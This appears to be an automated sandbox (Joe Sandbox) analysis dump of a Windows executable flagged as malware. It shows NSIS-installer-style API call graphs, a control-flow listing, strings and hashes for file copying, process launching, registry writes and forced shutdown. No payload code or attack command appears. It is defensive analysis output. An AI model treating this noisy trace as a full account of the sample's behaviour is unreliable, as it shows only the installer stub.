4019->4022 4020->4022 4021 401b56 4027 405bc7 lstrcpynA 4021->4027 4024 401b65 4029 405bc7 lstrcpynA 4024->4029 4026->4021 4027->4024 4028->4019 4029->4022 4030 4021a5 4031 402a29 18 API calls 4030->4031 4032 4021ab 4031->4032 4033 402a29 18 API calls 4032->4033 4034 4021b4 4033->4034 4035 402a29 18 API calls 4034->4035 4036 4021bd 4035->4036 4037 405ec2 2 API calls 4036->4037 4038 4021c6 4037->4038 4039 4021d7 lstrlenA lstrlenA 4038->4039 4040 4021ca 4038->4040 4042 404eb3 25 API calls 4039->4042 4041 404eb3 25 API calls 4040->4041 4043 4021d2 4040->4043 4041->4043 4044 402213 SHFileOperationA 4042->4044 4044->4040 4044->4043 4045 402227 4046 40222e 4045->4046 4048 402241 4045->4048 4047 405be9 18 API calls 4046->4047 4049 40223b 4047->4049 4050 405488 MessageBoxIndirectA 4049->4050 4050->4048 4051 401ca7 4052 402a0c 18 API calls 4051->4052 4053 401cae 4052->4053 4054 402a0c 18 API calls 4053->4054 4055 401cb6 GetDlgItem 4054->4055 4056 4024eb 4055->4056 3160 40312a SetErrorMode GetVersion 3161 403162 3160->3161 3162 403168 3160->3162 3163 405f57 5 API calls 3161->3163 3164 405ee9 3 API calls 3162->3164 3163->3162 3165 40317e lstrlenA 3164->3165 3165->3162 3166 40318d 3165->3166 3167 405f57 5 API calls 3166->3167 3168 403194 3167->3168 3169 405f57 5 API calls 3168->3169 3170 40319b #17 OleInitialize SHGetFileInfoA 3169->3170 3250 405bc7 lstrcpynA 3170->3250 3172 4031d8 GetCommandLineA 3251 405bc7 lstrcpynA 3172->3251 3174 4031ea GetModuleHandleA 3175 403201 3174->3175 3176 4056e5 CharNextA 3175->3176 3177 403215 CharNextA 3176->3177 3183 403222 3177->3183 3178 40328f 3179 4032a2 GetTempPathA 3178->3179 3252 4030f9 3179->3252 3181 4032b8 3184 4032e0 DeleteFileA 3181->3184 3185 4032bc GetWindowsDirectoryA lstrcatA 3181->3185 3182 4056e5 CharNextA 3182->3183 3183->3178 3183->3182 3189 403291 3183->3189 3262 402c55 GetTickCount GetModuleFileNameA 3184->3262 3186 4030f9 12 API calls 3185->3186 3188 4032d8 3186->3188 3188->3184 3191 403361 ExitProcess OleUninitialize 3188->3191 3346 405bc7 lstrcpynA 3189->3346 3190 4032f4 3190->3191 3193 40334d 3190->3193 3197 4056e5 CharNextA 3190->3197 3194 403485 3191->3194 3195 403376 3191->3195 3290 40361a 3193->3290 3199 403528 ExitProcess 3194->3199 3204 405f57 5 API calls 3194->3204 3198 405488 MessageBoxIndirectA 3195->3198 3201 40330b 3197->3201 3203 403384 ExitProcess 3198->3203 3200 40335d 3200->3191 3208 403328 3201->3208 3209 40338c 3201->3209 3205 403498 3204->3205 3206 405f57 5 API calls 3205->3206 3207 4034a1 3206->3207 3210 405f57 5 API calls 3207->3210 3212 40579b 18 API calls 3208->3212 3211 40540f 5 API calls 3209->3211 3213 4034aa 3210->3213 3214 403391 lstrcatA 3211->3214 3215 403333 3212->3215 3216 4034c8 3213->3216 3226 4034b8 GetCurrentProcess 3213->3226 3217 4033a2 lstrcatA 3214->3217 3218 4033ad lstrcatA lstrcmpiA 3214->3218 3215->3191 3347 405bc7 lstrcpynA 3215->3347 3221 405f57 5 API calls 3216->3221 3217->3218 3218->3191 3220 4033c9 3218->3220 3224 4033d5 3220->3224 3225 4033ce 3220->3225 3222 4034ff 3221->3222 3227 403514 ExitWindowsEx 3222->3227 3232 403521 3222->3232 3223 403342 3348 405bc7 lstrcpynA 3223->3348 3230 4053f2 2 API calls 3224->3230 3229 405375 4 API calls 3225->3229 3226->3216 3227->3199 3227->3232 3231 4033d3 3229->3231 3233 4033da SetCurrentDirectoryA 3230->3233 3231->3233 3234 40140b 2 API calls 3232->3234 3235 4033f4 3233->3235 3236 4033e9 3233->3236 3234->3199 3350 405bc7 lstrcpynA 3235->3350 3349 405bc7 lstrcpynA 3236->3349 3239 405be9 18 API calls 3240 403424 DeleteFileA 3239->3240 3241 403431 CopyFileA 3240->3241 3247 403402 3240->3247 3241->3247 3242 403479 3244 405915 40 API calls 3242->3244 3243 405915 40 API calls 3243->3247 3245 403480 3244->3245 3245->3191 3246 405be9 18 API calls 3246->3247 3247->3239 3247->3242 3247->3243 3247->3246 3248 405427 2 API calls 3247->3248 3249 403465 CloseHandle 3247->3249 3248->3247 3249->3247 3250->3172 3251->3174 3253 405e29 5 API calls 3252->3253 3254 403105 3253->3254 3255 40310f 3254->3255 3256 4056ba 3 API calls 3254->3256 3255->3181 3257 403117 3256->3257 3258 4053f2 2 API calls 3257->3258 3259 40311d 3258->3259 3351 4058cd 3259->3351 3355 40589e GetFileAttributesA CreateFileA 3262->3355 3264 402c95 3282 402ca5 3264->3282 3356 405bc7 lstrcpynA 3264->3356 3266 402cbb 3267 405701 2 API calls 3266->3267 3268 402cc1 3267->3268 3357 405bc7 lstrcpynA 3268->3357 3270 402ccc GetFileSize 3271 402dc8 3270->3271 3284 402ce3 3270->3284 3358 402bf1 3271->3358 3273 402dd1 3275 402e01 GlobalAlloc 3273->3275 3273->3282 3369 4030e2 SetFilePointer 3273->3369 3274 4030b0 ReadFile 3274->3284 3370 4030e2 SetFilePointer 3275->3370 3277 402e34 3279 402bf1 6 API calls 3277->3279 3279->3282 3280 402dea 3283 4030b0 ReadFile 3280->3283 3281 402e1c 3285 402e8e 33 API calls 3281->3285 3282->3190 3286 402df5 3283->3286 3284->3271 3284->3274 3284->3277 3284->3282 3287 402bf1 6 API calls 3284->3287 3288 402e28 3285->3288 3286->3275 3286->3282 3287->3284 3288->3282 3288->3288 3289 402e65 SetFilePointer 3288->3289 3289->3282 3291 405f57 5 API calls 3290->3291 3292 40362e 3291->3292 3293 403634 3292->3293 3294 403646 3292->3294 3380 405b25 wsprintfA 3293->3380 3295 405aae 3 API calls 3294->3295 3296 403667 3295->3296 3298 403685 lstrcatA 3296->3298 3300 405aae 3 API calls 3296->3300 3299 403644 3298->3299 3371 4038e3 3299->3371 3300->3298 3303 40579b 18 API calls 3304 4036b7 3303->3304 3305 403740 3304->3305 3307 405aae 3 API calls 3304->3307 3306 40579b 18 API calls 3305->3306 3308 403746 3306->3308 3309 4036e3 3307->3309 3310 403756 LoadImageA 3308->3310 3311 405be9 18 API calls 3308->3311 3309->3305 3314 4036ff lstrlenA 3309->3314 3318 4056e5 CharNextA 3309->3318 3312 403781 RegisterClassA 3310->3312 3313 40380a 3310->3313 3311->3310 3315 403814 3312->3315 3316 4037bd SystemParametersInfoA CreateWindowExA 3312->3316 3317 40140b 2 API calls 3313->3317 3319 403733 3314->3319 3320 40370d lstrcmpiA 3314->3320 3315->3200 3316->3313 3321 403810 3317->3321 3322 4036fd 3318->3322 3324 4056ba 3 API calls 3319->3324 3320->3319 3323 40371d GetFileAttributesA 3320->3323 3321->3315 3326 4038e3 19 API calls 3321->3326 3322->3314 3325 403729 3323->3325 3327 403739 3324->3327 3325->3319 3328 405701 2 API calls 3325->3328 3329 403821 3326->3329 3381 405bc7 lstrcpynA 3327->3381 3328->3319 3331 4038b0 3329->3331 3332 40382d ShowWindow 3329->3332 3382 404f85 OleInitialize 3331->3382 3333 405ee9 3 API calls 3332->3333 3335 403845 3333->3335 3337 403853 GetClassInfoA 3335->3337 3340 405ee9 3 API calls 3335->3340 3336 4038b6 3338 4038d2 3336->3338 3339 4038ba 3336->3339 3342 403867 GetClassInfoA RegisterClassA 3337->3342 3343 40387d DialogBoxParamA 3337->3343 3341 40140b 2 API calls 3338->3341 3339->3315 3344 40140b 2 API calls 3339->3344 3340->3337 3341->3315 3342->3343 3345 40140b 2 API calls 3343->3345 3344->3315 3345->3315 3346->3179 3347->3223 3348->3193 3349->3235 3350->3247 3352 4058d8 GetTickCount GetTempFileNameA 3351->3352 3353 405904 3352->3353 3354 403128 3352->3354 3353->3352 3353->3354 3354->3181 3355->3264 3356->3266 3357->3270 3359 402c12 3358->3359 3360 402bfa 3358->3360 3363 402c22 GetTickCount 3359->3363 3364 402c1a 3359->3364 3361 402c03 DestroyWindow 3360->3361 3362 402c0a 3360->3362 3361->3362 3362->3273 3366 402c30 CreateDialogParamA ShowWindow 3363->3366 3367 402c53 3363->3367 3365 405f93 2 API calls 3364->3365 3368 402c20 3365->3368 3366->3367 3367->3273 3368->3273 3369->3280 3370->3281 3372 4038f7 3371->3372 3389 405b25 wsprintfA 3372->3389 3374 403968 3375 405be9 18 API calls 3374->3375 3376 403974 SetWindowTextA 3375->3376 3377 403990 3376->3377 3378 403695 3376->3378 3377->3378 3379 405be9 18 API calls 3377->3379 3378->3303 3379->3377 3380->3299 3381->3305 3383 403ecf SendMessageA 3382->3383 3387 404fa8 3383->3387 3384 404fcf 3385 403ecf SendMessageA 3384->3385 3386 404fe1 OleUninitialize 3385->3386 3386->3336 3387->3384 3388 401389 2 API calls 3387->3388 3388->3387 3389->3374 4057 40262e 4058 402635 4057->4058 4060 4028be 4057->4060 4059 40263b FindClose 4058->4059 4059->4060 4061 4026af 4062 402a29 18 API calls 4061->4062 4064 4026bd 4062->4064 4063 4026d3 4066 40587f 2 API calls 4063->4066 4064->4063 4065 402a29 18 API calls 4064->4065 4065->4063 4067 4026d9 4066->4067 4087 40589e GetFileAttributesA CreateFileA 4067->4087 4069 4026e6 4070 4026f2 GlobalAlloc 4069->4070 4071 40278f 4069->4071 4072 402786 CloseHandle 4070->4072 4073 40270b 4070->4073 4074 402797 DeleteFileA 4071->4074 4075 4027aa 4071->4075 4072->4071 4088 4030e2 SetFilePointer 4073->4088 4074->4075 4077 402711 4078 4030b0 ReadFile 4077->4078 4079 40271a GlobalAlloc 4078->4079 4080 40272a 4079->4080 4081 40275e WriteFile GlobalFree 4079->4081 4083 402e8e 33 API calls 4080->4083 4082 402e8e 33 API calls 4081->4082 4084 402783 4082->4084 4086 402737 4083->4086 4084->4072 4085 402755 GlobalFree 4085->4081 4086->4085 4087->4069 4088->4077 2921 4039b0 2922 403b03 2921->2922 2923 4039c8 2921->2923 2925 403b54 2922->2925 2926 403b14 GetDlgItem GetDlgItem 2922->2926 2923->2922 2924 4039d4 2923->2924 2927 4039f2 2924->2927 2928 4039df SetWindowPos 2924->2928 2930 403bae 2925->2930 3020 401389 2925->3020 3017 403e83 2926->3017 2932 4039f7 ShowWindow 2927->2932 2933 403a0f 2927->2933 2928->2927 2935 403afe 2930->2935 2994 403ecf 2930->2994 2932->2933 2936 403a31 2933->2936 2937 403a17 DestroyWindow 2933->2937 2934 403b3e SetClassLongA 2938 40140b 2 API calls 2934->2938 2941 403a36 SetWindowLongA 2936->2941 2942 403a47 2936->2942 2940 403e2d 2937->2940 2938->2925 2940->2935 2950 403e3d ShowWindow 2940->2950 2941->2935 2946 403af0 2942->2946 2947 403a53 GetDlgItem 2942->2947 2944 40140b 2 API calls 2951 403bc0 2944->2951 2945 403e0e DestroyWindow EndDialog 2945->2940 3003 403eea 2946->3003 2952 403a83 2947->2952 2953 403a66 SendMessageA IsWindowEnabled 2947->2953 2948 403b8a SendMessageA 2948->2935 2950->2935 2951->2944 2951->2945 2954 405be9 18 API calls 2951->2954 2965 403e83 19 API calls 2951->2965 2967 403e83 19 API calls 2951->2967 2955 403a88 2952->2955 2956 403a90 2952->2956 2957 403ad7 SendMessageA 2952->2957 2958 403aa3 2952->2958 2953->2935 2953->2952 2954->2951 3000 403e5c 2955->3000 2956->2955 2956->2957 2957->2946 2960 403ac0 2958->2960 2961 403aab 2958->2961 2964 40140b 2 API calls 2960->2964 2997 40140b 2961->2997 2962 403abe 2962->2946 2966 403ac7 2964->2966 2965->2951 2966->2946 2966->2955 2968 403c3b GetDlgItem 2967->2968 2969 403c50 2968->2969 2970 403c58 ShowWindow EnableWindow 2968->2970 2969->2970 3024 403ea5 EnableWindow 2970->3024 2972 403c82 EnableWindow 2975 403c96 2972->2975 2973 403c9b GetSystemMenu EnableMenuItem SendMessageA 2974 403ccb SendMessageA 2973->2974 2973->2975 2974->2975 2975->2973 3025 403eb8 SendMessageA 2975->3025 3026 405bc7 lstrcpynA 2975->3026 2978 403cf9 lstrlenA 2979 405be9 18 API calls 2978->2979 2980 403d0a SetWindowTextA 2979->2980 2981 401389 2 API calls 2980->2981 2982 403d1b 2981->2982 2982->2935 2982->2951 2983 403d4e DestroyWindow 2982->2983 2985 403d49 2982->2985 2983->2940 2984 403d68 CreateDialogParamA 2983->2984 2984->2940 2986 403d9b 2984->2986 2985->2935 2987 403e83 19 API calls 2986->2987 2988 403da6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2987->2988 2989 401389 2 API calls 2988->2989 2990 403dec 2989->2990 2990->2935 2991 403df4 ShowWindow 2990->2991 2992 403ecf SendMessageA 2991->2992 2993 403e0c 2992->2993 2993->2940 2995 403ee7 2994->2995 2996 403ed8 SendMessageA 2994->2996 2995->2951 2996->2995 2998 401389 2 API calls 2997->2998 2999 401420 2998->2999 2999->2955 3001 403e63 3000->3001 3002 403e69 SendMessageA 3000->3002 3001->3002 3002->2962 3004 403f8b 3003->3004 3005 403f02 GetWindowLongA 3003->3005 3004->2935 3005->3004 3006 403f13 3005->3006 3007 403f22 GetSysColor 3006->3007 3008 403f25 3006->3008 3007->3008 3009 403f35 SetBkMode 3008->3009 3010 403f2b SetTextColor 3008->3010 3011 403f53 3009->3011 3012 403f4d GetSysColor 3009->3012 3010->3009 3013 403f64 3011->3013 3014 403f5a SetBkColor 3011->3014 3012->3011 3013->3004 3015 403f77 DeleteObject 3013->3015 3016 403f7e CreateBrushIndirect 3013->3016 3014->3013 3015->3016 3016->3004 3018 405be9 18 API calls 3017->3018 3019 403e8e SetDlgItemTextA 3018->3019 3019->2934 3022 401390 3020->3022 3021 4013fe 3021->2930 3021->2948 3022->3021 3023 4013cb MulDiv SendMessageA 3022->3023 3023->3022 3024->2972 3025->2975 3026->2978 4089 4027b0 4090 402a0c 18 API calls 4089->4090 4091 4027b6 4090->4091 4092 4027f1 4091->4092 4093 4027da 4091->4093 4099 40268f 4091->4099 4094 402807 4092->4094 4095 4027fb 4092->4095 4096 4027df 4093->4096 4102 4027ee 4093->4102 4098 405be9 18 API calls 4094->4098 4097 402a0c 18 API calls 4095->4097 4103 405bc7 lstrcpynA 4096->4103 4097->4102 4098->4102 4102->4099 4104 405b25 wsprintfA 4102->4104 4103->4099 4104->4099 4105 401eb2 4106 402a29 18 API calls 4105->4106 4107 401eb9 4106->4107 4108 405ec2 2 API calls 4107->4108 4109 401ebf 4108->4109 4111 401ed1 4109->4111 4112 405b25 wsprintfA 4109->4112 4112->4111 3102 4015b3 3103 402a29 18 API calls 3102->3103 3104 4015ba 3103->3104 3105 40574e 4 API calls 3104->3105 3117 4015c2 3105->3117 3106 40161c 3108 401621 3106->3108 3109 40164a 3106->3109 3107 4056e5 CharNextA 3107->3117 3129 401423 3108->3129 3111 401423 25 API calls 3109->3111 3118 401642 3111->3118 3116 401633 SetCurrentDirectoryA 3116->3118 3117->3106 3117->3107 3119 401604 GetFileAttributesA 3117->3119 3121 40540f 3117->3121 3124 405375 CreateDirectoryA 3117->3124 3133 4053f2 CreateDirectoryA 3117->3133 3119->3117 3122 405f57 5 API calls 3121->3122 3123 405416 3122->3123 3123->3117 3125 4053c2 3124->3125 3126 4053c6 GetLastError 3124->3126 3125->3117 3126->3125 3127 4053d5 SetFileSecurityA 3126->3127 3127->3125 3128 4053eb GetLastError 3127->3128 3128->3125 3130 404eb3 25 API calls 3129->3130 3131 401431 3130->3131 3132 405bc7 lstrcpynA 3131->3132 3132->3116 3134 405402 3133->3134 3135 405406 GetLastError 3133->3135 3134->3117 3135->3134 4113 4016b3 4114 402a29 18 API calls 4113->4114 4115 4016b9 GetFullPathNameA 4114->4115 4116 4016d0 4115->4116 4122 4016f1 4115->4122 4119 405ec2 2 API calls 4116->4119 4116->4122 4117 401705 GetShortPathNameA 4118 4028be 4117->4118 4120 4016e1 4119->4120 4120->4122 4123 405bc7 lstrcpynA 4120->4123 4122->4117 4122->4118 4123->4122 4124 402336 4125 40233c 4124->4125 4126 402a29 18 API calls 4125->4126 4127 40234e 4126->4127 4128 402a29 18 API calls 4127->4128 4129 402358 RegCreateKeyExA 4128->4129 4130 402382 4129->4130 4132 4028be 4129->4132 4131 40239a 4130->4131 4133 402a29 18 API calls 4130->4133 4134 402a0c 18 API calls 4131->4134 4136 4023a6 4131->4136 4137 402393 lstrlenA 4133->4137 4134->4136 4135 4023c1 RegSetValueExA 4139 4023d7 RegCloseKey 4135->4139 4136->4135 4138 402e8e 33 API calls 4136->4138 4137->4131 4138->4135 4139->4132 4141 402836 4142 402a0c 18 API calls 4141->4142 4143 40283c 4142->4143 4144 40284a 4143->4144 4145 40286d 4143->4145 4146 40268f 4143->4146 4144->4146 4149 405b25 wsprintfA 4144->4149 4145->4146 4147 405be9 18 API calls 4145->4147 4147->4146 4149->4146 4150 4014b7 4151 4014bd 4150->4151 4152 401389 2 API calls 4151->4152 4153 4014c5 4152->4153 3136 401e38 3137 402a29 18 API calls 3136->3137 3138 401e3e 3137->3138 3139 404eb3 25 API calls 3138->3139 3140 401e48 3139->3140 3152 405427 CreateProcessA 3140->3152 3142 401ea4 CloseHandle 3144 40268f 3142->3144 3143 401e6d WaitForSingleObject 3145 401e4e 3143->3145 3146 401e7b GetExitCodeProcess 3143->3146 3145->3142 3145->3143 3145->3144 3155 405f93 3145->3155 3148 401e98 3146->3148 3149 401e8d 3146->3149 3148->3142 3151 401e96 3148->3151 3159 405b25 wsprintfA 3149->3159 3151->3142 3153 405462 3152->3153 3154 405456 CloseHandle 3152->3154 3153->3145 3154->3153 3156 405fb0 PeekMessageA 3155->3156 3157 405fc0 3156->3157 3158 405fa6 DispatchMessageA 3156->3158 3157->3143 3158->3156 3159->3151 4154 401d38 GetDC GetDeviceCaps 4155 402a0c 18 API calls 4154->4155 4156 401d54 MulDiv 4155->4156 4157 402a0c 18 API calls 4156->4157 4158 401d69 4157->4158 4159 405be9 18 API calls 4158->4159 4160 401da2 CreateFontIndirectA 4159->4160 4161 4024eb 4160->4161 4162 402539 4163 402a0c 18 API calls 4162->4163 4166 402543 4163->4166 4164 4025b9 4165 402577 ReadFile 4165->4164 4165->4166 4166->4164 4166->4165 4167 4025bb 4166->4167 4168 4025cb 4166->4168 4171 405b25 wsprintfA 4167->4171 4168->4164 4170 4025e1 SetFilePointer 4168->4170 4170->4164 4171->4164 3396 40173e 3397 402a29 18 API calls 3396->3397 3398 401745 3397->3398 3399 4058cd 2 API calls 3398->3399 3400 40174c 3399->3400 3401 4058cd 2 API calls 3400->3401 3401->3400 4172 40193f 4173 402a29 18 API calls 4172->4173 4174 401946 lstrlenA 4173->4174 4175 4024eb 4174->4175

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 0 40312a-403160 SetErrorMode GetVersion 1 403162-40316a call 405f57 0->1 2 403173 0->2 1->2 7 40316c 1->7 4 403178-40318b call 405ee9 lstrlenA 2->4 9 40318d-4031ff call 405f57 * 2 #17 OleInitialize SHGetFileInfoA call 405bc7 GetCommandLineA call 405bc7 GetModuleHandleA 4->9 7->2 18 403201-403206 9->18 19 40320b-403220 call 4056e5 CharNextA 9->19 18->19 22 403289-40328d 19->22 23 403222-403225 22->23 24 40328f 22->24 25 403227-40322b 23->25 26 40322d-403235 23->26 27 4032a2-4032ba GetTempPathA call 4030f9 24->27 25->25 25->26 28 403237-403238 26->28 29 40323d-403240 26->29 37 4032e0-4032fa DeleteFileA call 402c55 27->37 38 4032bc-4032da GetWindowsDirectoryA lstrcatA call 4030f9 27->38 28->29 31 403242-403246 29->31 32 403279-403286 call 4056e5 29->32 35 403258-40325e 31->35 36 403248-403251 31->36 32->22 49 403288 32->49 40 403270-403277 35->40 41 403260-403269 35->41 36->35 44 403253 36->44 50 403361-403370 ExitProcess OleUninitialize 37->50 51 4032fc-403302 37->51 38->37 38->50 40->32 47 403291-40329d call 405bc7 40->47 41->40 46 40326b 41->46 44->35 46->40 47->27 49->22 55 403485-40348b 50->55 56 403376-403386 call 405488 ExitProcess 50->56 53 403351-403358 call 40361a 51->53 54 403304-40330d call 4056e5 51->54 62 40335d 53->62 69 403318-40331a 54->69 60 403491-4034ae call 405f57 * 3 55->60 61 403528-403530 55->61 84 4034b0-4034b2 60->84 85 4034f8-403506 call 405f57 60->85 64 403532 61->64 65 403536-40353a ExitProcess 61->65 62->50 64->65 71 40331c-403326 69->71 72 40330f-403315 69->72 75 403328-403335 call 40579b 71->75 76 40338c-4033a0 call 40540f lstrcatA 71->76 72->71 74 403317 72->74 74->69 75->50 83 403337-40334d call 405bc7 * 2 75->83 86 4033a2-4033a8 lstrcatA 76->86 87 4033ad-4033c7 lstrcatA lstrcmpiA 76->87 83->53 84->85 90 4034b4-4034b6 84->90 97 403514-40351f ExitWindowsEx 85->97 98 403508-403512 85->98 86->87 87->50 89 4033c9-4033cc 87->89 94 4033d5 call 4053f2 89->94 95 4033ce-4033d3 call 405375 89->95 90->85 96 4034b8-4034ca GetCurrentProcess 90->96 105 4033da-4033e7 SetCurrentDirectoryA 94->105 95->105 96->85 111 4034cc-4034ee 96->111 97->61 104 403521-403523 call 40140b 97->104 98->97 98->104 104->61 109 4033f4-40340e call 405bc7 105->109 110 4033e9-4033ef call 405bc7 105->110 116 403413-40342f call 405be9 DeleteFileA 109->116 110->109 111->85 119 403470-403477 116->119 120 403431-403441 CopyFileA 116->120 119->116 122 403479-403480 call 405915 119->122 120->119 121 403443-403463 call 405915 call 405be9 call 405427 120->121 121->119 131 403465-40346c CloseHandle 121->131 122->50 131->119
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNELBASE ref: 00403150
                                                                                                                                                                  • GetVersion.KERNEL32 ref: 00403156
                                                                                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
                                                                                                                                                                  • #17.COMCTL32(0000000B,0000000D), ref: 004031A0
                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 004031A7
                                                                                                                                                                  • SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
                                                                                                                                                                  • GetCommandLineA.KERNEL32(ylpuxzibyo Setup,NSIS Error), ref: 004031D8
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",00000000), ref: 004031EB
                                                                                                                                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",00409168), ref: 00403216
                                                                                                                                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020), ref: 004032AD
                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 004032C2
                                                                                                                                                                  • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004032CE
                                                                                                                                                                  • DeleteFileA.KERNELBASE(1033), ref: 004032E5
                                                                                                                                                                    • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                                                                                                    • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                                                                                                  • ExitProcess.KERNEL32(00000020), ref: 00403361
                                                                                                                                                                  • OleUninitialize.OLE32(00000020), ref: 00403366
                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403386
                                                                                                                                                                  • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",00000000,00000020), ref: 00403399
                                                                                                                                                                  • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00409148,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",00000000,00000020), ref: 004033A8
                                                                                                                                                                  • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",00000000,00000020), ref: 004033B3
                                                                                                                                                                  • lstrcmpiA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033BF
                                                                                                                                                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 004033DB
                                                                                                                                                                  • DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
                                                                                                                                                                  • CopyFileA.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe,00428C58,00000001), ref: 00403439
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00428C58,00428C58,?,00428C58,00000000), ref: 00403466
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
                                                                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403517
                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040353A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                                                                                                                                  • String ID: $ /D=$ _?=$ mo$"$"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$ylpuxzibyo Setup$~nsu
                                                                                                                                                                  • API String ID: 1031542678-954327099
                                                                                                                                                                  • Opcode ID: 86d32bbf67157276347dd15ba2004fb4ddc1ee64470de8bb5c85f9652657bc9c
                                                                                                                                                                  • Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
                                                                                                                                                                  • Opcode Fuzzy Hash: 86d32bbf67157276347dd15ba2004fb4ddc1ee64470de8bb5c85f9652657bc9c
                                                                                                                                                                  • Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 376 4054ec-405507 call 40579b 379 405520-40552a 376->379 380 405509-40551b DeleteFileA 376->380 382 40552c-40552e 379->382 383 40553e-40554c call 405bc7 379->383 381 4056b4-4056b7 380->381 384 405534-405538 382->384 385 40565f-405665 382->385 391 40555b-40555c call 405701 383->391 392 40554e-405559 lstrcatA 383->392 384->383 384->385 385->381 387 405667-40566a 385->387 389 405674-40567c call 405ec2 387->389 390 40566c-405672 387->390 389->381 399 40567e-405693 call 4056ba call 40587f RemoveDirectoryA 389->399 390->381 394 405561-405564 391->394 392->394 397 405566-40556d 394->397 398 40556f-405575 lstrcatA 394->398 397->398 400 40557a-405598 lstrlenA FindFirstFileA 397->400 398->400 415 405695-405699 399->415 416 4056ac-4056af call 404eb3 399->416 401 405655-405659 400->401 402 40559e-4055b5 call 4056e5 400->402 401->385 406 40565b 401->406 409 4055c0-4055c3 402->409 410 4055b7-4055bb 402->410 406->385 413 4055c5-4055ca 409->413 414 4055d6-4055e4 call 405bc7 409->414 410->409 412 4055bd 410->412 412->409 418 405634-405646 FindNextFileA 413->418 419 4055cc-4055ce 413->419 426 4055e6-4055ee 414->426 427 4055fb-40560a call 40587f DeleteFileA 414->427 415->390 421 40569b-4056aa call 404eb3 call 405915 415->421 416->381 418->402 424 40564c-40564f FindClose 418->424 419->414 422 4055d0-4055d4 419->422 421->381 422->414 422->418 424->401 426->418 430 4055f0-4055f9 call 4054ec 426->430 435 40562c-40562f call 404eb3 427->435 436 40560c-405610 427->436 430->418 435->418 438 405612-405622 call 404eb3 call 405915 436->438 439 405624-40562a 436->439 438->418 439->418
